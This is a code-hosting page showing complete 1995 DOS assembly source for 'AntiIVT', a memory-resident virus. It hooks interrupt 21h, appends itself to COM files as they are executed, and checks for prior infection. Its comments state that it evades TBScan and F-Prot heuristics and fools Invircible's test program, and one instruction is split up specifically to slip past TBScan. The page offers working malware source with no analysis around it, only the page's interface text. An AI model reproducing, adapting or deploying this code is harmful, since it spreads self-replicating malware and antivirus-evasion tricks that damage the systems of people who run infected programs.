📄 antiivt.asm
字号:
; AntiIVT - written by Conzouler/IR 1995
;
; A virus based on RSV which fool Invircible's test program.
;
; Features:
; memory resident
; com-append on execute
; no tb-flags (of course)
; no f-prot heuristics
; fools invircible test
;
.model tiny
.code
org 100h
psize equ (offset last - offset entry) / 10h + 2
size equ offset last - offset entry
entry:
db 0e9h,0,0 ; Initial jump
start:
call gores
oentry db 0CDh,20h,90h
gores:
mov ax, 4277h ; Installation check
int 21h
jnc restore
mov ah, 4Ah ; Get size of memory block
mov bx, 0FFFFh
int 21h
mov ah, 4Ah ; Change size of memory
sub bx, psize+1 ; Make space for virus
int 21h
mov ah, 48h ; Allocate memory
mov bx, psize
int 21h
sub ax, 10h ; Compensate org 100h
mov es, ax
mov di, 103h
mov si, sp ; Get entry point
mov si, [si]
sub si, 3 ; Subtract first call
mov cx, size-3
rep movsb ; Copy virus to new memory
push es
pop ds
inc byte ptr ds:[0F1h] ; Mark owner of memory
mov ax, 3521h ; Get interrupt vector
int 21h
mov i21o, bx
mov i21s, es
mov ah, 25h ; Set interrupt vector
mov dx, offset vec21
int 21h
restore:
mov di, 100h
push cs ; Set es and ds to psp
pop ds
push ds
pop es
pop si ; Get entry point
push di ; Save it
movsw ; Restore program entry point
movsb
retn ; Jump to 100h
vec21:
cmp ax, 4277h ; Installation check
jne v21e
iret
v21e: cmp ax, 4B00h ; Execute program
jne v21x
push ax ; Infect file
push bx
push cx
push dx
push ds
; This routine checks the name of the currently running program.
mov ah, 62h ; Get psp
int 21h
dec bx
mov ds, bx
cmp word ptr ds:[8], 'VI'
je infectend
pop ds
push ds
mov ax, 3D82h ; Open file
int 21h
xchg ax, bx ; Put handle in bx
push cs ; Read first bytes
pop ds ; to oentry
mov ah, 3Fh
mov dx, offset oentry
mov cx, 3
int 21h
cmp byte ptr oentry, 'M' ; Check if exe file
je infectx
push cx
mov ax, 4202h ; Seek to eof
xor cx, cx
cwd ; Zero dx
int 21h
sub ax, 3 ; Get offset to eof
mov word ptr entry[1], ax ; Save as jump
xchg dx, ax
mov ax, 4200h
int 21h
mov ah, 3Fh ; Infection check
mov dx, offset last
pop cx
int 21h
cmp byte ptr last[2], 0EAh ; Check if infected
je infectx
mov byte ptr entry, 0E9h ; Create jump opcode
mov ah, 3Fh ; Append virus
inc ah ; Fool TBScan
push ax
mov dx, 103h
mov cx, size-7
int 21h
mov ax, 4200h ; Insert jump
xor cx, cx
cwd
int 21h
pop ax
mov dh, 1h ; 100h in dx
mov cl, 3 ; 3 in cx
int 21h
infectx:
mov ah, 3Eh
int 21h
infectend:
pop ds
pop dx
pop cx
pop bx
pop ax
v21x: db 0EAh ; Jump to dos vector
i21o dw ?
i21s dw ?
last:
end entry
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -